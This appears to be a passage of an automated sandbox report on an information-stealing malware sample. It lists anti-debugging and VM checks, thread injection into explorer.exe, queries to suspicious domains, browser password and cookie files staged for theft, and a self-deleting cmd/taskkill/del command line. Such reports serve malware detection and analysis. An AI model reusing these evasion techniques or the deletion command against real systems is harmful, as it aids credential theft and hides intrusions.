Source: explorer.exe, 00000003.00000000.267636663.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: SmartClock.exe, 00000016.00000003.425862940.0000000005511000.00000004.00000001.sdmp	Binary or memory string: XrcfcBurCQSyKfUqMJ2qEMU6FmoBmhanhh
Source: explorer.exe, 00000003.00000000.267636663.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000003.00000000.263447837.00000000048E0000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SmartClock.exe, 00000016.00000002.517352536.00000000055F0000.00000004.00000001.sdmp	Binary or memory string: LWqVMci5qHvUnsKpwcYNY7RXNZt5vS6LEY1
Source: explorer.exe, 00000003.00000000.285879491.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000003.00000000.267636663.0000000008B88000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000003.00000000.285879491.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.299480984.00000000069DA000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD002
Source: SmartClock.exe, 00000016.00000002.516400771.0000000005490000.00000004.00000001.sdmp	Binary or memory string: 12Rvkx1Qnn4xRxT7eBSbHGfSJhrJ9dXfc4
Source: explorer.exe, 00000003.00000000.267914586.0000000008CC6000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040F64C FindFirstFileExW,	19_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040F64C FindFirstFileExW,	22_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040F64C FindFirstFileExW,	23_2_0040F64C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040F64C FindFirstFileExW,	26_2_0040F64C

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

System information queried: ModuleInformation

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	System information queried: CodeIntegrityInformation			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_02F10083 push dword ptr fs:[00000030h]	0_2_02F10083
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_030A092B mov eax, dword ptr fs:[00000030h]	14_2_030A092B
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_030A0D90 mov eax, dword ptr fs:[00000030h]	14_2_030A0D90
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	19_2_0040E0E2
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004106D5 mov eax, dword ptr fs:[00000030h]	19_2_004106D5
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_04CE0083 push dword ptr fs:[00000030h]	19_2_04CE0083
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	22_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004106D5 mov eax, dword ptr fs:[00000030h]	22_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_04C30083 push dword ptr fs:[00000030h]	22_2_04C30083
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	23_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004106D5 mov eax, dword ptr fs:[00000030h]	23_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_04CF0083 push dword ptr fs:[00000030h]	23_2_04CF0083
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040E0E2 mov eax, dword ptr fs:[00000030h]	26_2_0040E0E2
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004106D5 mov eax, dword ptr fs:[00000030h]	26_2_004106D5
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_04D90083 push dword ptr fs:[00000030h]	26_2_04D90083

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

Code function: 0_2_0040C066 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0040C066

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_0041178C GetProcessHeap,

19_2_0041178C

Enables debug privileges

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040C066 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040C066
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040C066 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_0040C066
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0040A1A9
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A33C SetUnhandledExceptionFilter,	19_2_0040A33C
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_0040D33E
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A33C SetUnhandledExceptionFilter,	22_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A33C SetUnhandledExceptionFilter,	23_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_0040A638
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040A1A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_0040A1A9
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040A33C SetUnhandledExceptionFilter,	26_2_0040A33C
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040D33E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	26_2_0040D33E
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_0040A638 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	26_2_0040A638

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: bitbucket.org
Source: C:\Windows\explorer.exe	Domain query: bbuseruploads.s3.amazonaws.com
Source: C:\Windows\explorer.exe	Domain query: wedoepicsht.com
Source: C:\Windows\explorer.exe	Domain query: brandyjaggers.com

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 45C4.exe.3.dr

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Thread created: C:\Windows\explorer.exe EIP: 30F1A18			Jump to behavior
Source: C:\Users\user\AppData\Roaming\jajvesg	Thread created: unknown EIP: 4EC1A18			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe 'C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f	Jump to behavior

Uses taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f

Source: explorer.exe, 00000003.00000000.262748208.0000000001400000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: explorer.exe, 00000003.00000000.283010257.0000000005F40000.00000004.00000001.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.262748208.0000000001400000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.262748208.0000000001400000.00000002.00020000.sdmp, SmartClock.exe, 00000016.00000002.514703080.0000000003790000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.293417561.0000000000EB8000.00000004.00000020.sdmp	Binary or memory string: ProgmanX
Source: explorer.exe, 00000003.00000000.285879491.0000000008ACF000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndAj

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\CC\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Cookies\Edge_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Cookies\IE_Cookies.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Downloads\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\Files\ .zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\History\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Queries volume information: C:\ProgramData\JD01X9KLRK1KN5GDZZMAKOP40\files\passwords.txt VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_0040A45B cpuid

19_2_0040A45B

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid